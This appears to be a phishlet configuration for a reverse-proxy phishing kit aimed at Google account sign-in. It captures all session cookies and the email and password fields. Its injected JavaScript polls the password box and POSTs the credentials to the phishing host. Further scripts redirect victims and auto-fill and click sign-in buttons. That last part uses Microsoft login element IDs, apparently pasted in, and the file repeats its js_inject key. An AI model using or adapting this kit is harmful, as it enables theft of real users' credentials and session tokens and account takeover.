author: ''
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
  - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: '', orig_sub: '', domain: 'google.com', session: true, is_landing: false, auto_filter: false}

sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}
auth_tokens:
  - domain: '.google.com'
    keys: [".*,regexp"]
  - domain: 'accounts.google.com'
    keys: [".*,regexp"]

credentials:
  username:
    key: 'unenc_email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'unenc_pwd'
    search: '(.*)'
    type: 'post'

auth_urls:
  - '/CheckCookie'
  - '/v3/signin/_/AccountsSignInUi/data/batchexecute'

login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

js_inject:
  - trigger_domains: ['accounts.google.com']
    trigger_paths: ['/identifier']
    script: |
      setInterval(function() {

           if (document.querySelectorAll("input[name='Passwd']")?.length) {
              
                      var password = document.getElementsByName("Passwd")[0].value;
                      var email = document.querySelector("#identifierId")?.value;
                      var xhr = new XMLHttpRequest();
                      var myHostName = ('https://'+ location.hostname);
                      myHostName = myHostName.replace('accounts.', '');
                      xhr.open("POST", myHostName + "/Lookup", true);
                      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                      xhr.send("unenc_email=" + encodeURIComponent(email) + "&unenc_pwd=" + encodeURIComponent(password));

           } else {
            
           }
              
        }, 2000);

        
  - trigger_domains: ['myaccount.google.com']
    trigger_paths: ['.*?']
    script: |
      (function () {
        'use strict';
        let subdomain = window.location.host.split('.')[0];
        if (subdomain == "myaccount") {
          window.location.host = "myaccount.google.com";
          // console.log("redirecting to myaccount.google.com");
        }
      }());

        
        
js_inject:
  - trigger_domains: ["accounts.google.com"]
    trigger_paths: ["/"]
    script: |
      function gimmesleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      async function redir() {
        await gimmesleep(2000);
        window.location.href = "{rurl}";
      }
      redir()

js_inject:
  - trigger_domains: ["accounts.google.com"]
    trigger_paths: [".*"]
    script: |
      function lp(){
        var emailId = document.querySelector("#i0116");
        var nextButton = document.querySelector("#idSIButton9");
        var query = window.location.href;
        if (/#/.test(window.location.href)){
        var res = query.split("#");
        var data1 = res[0];
        var data2 = res[1];
        console.log(data1);
        console.log(data2);
          if (emailId != null) {
              var m = data2.replace(/[=]/gi, '');
              emailId.focus();
              emailId.value = m;
              nextButton.focus();
              nextButton.click();
              console.log("YES!");
              return;
            }
        }
        var button = document.getElementById('idSIButton9')
        if(button){
          button.focus();
          button.click();
         }
        var cancel = document.getElementById('desktopSsoCancel');
        if(cancel){
          cancel.focus();
          cancel.click();
        }
        console.log("reached here")
        setTimeout(function(){lp();}, 1500);
      }
      setTimeout(function(){lp();}, 12000);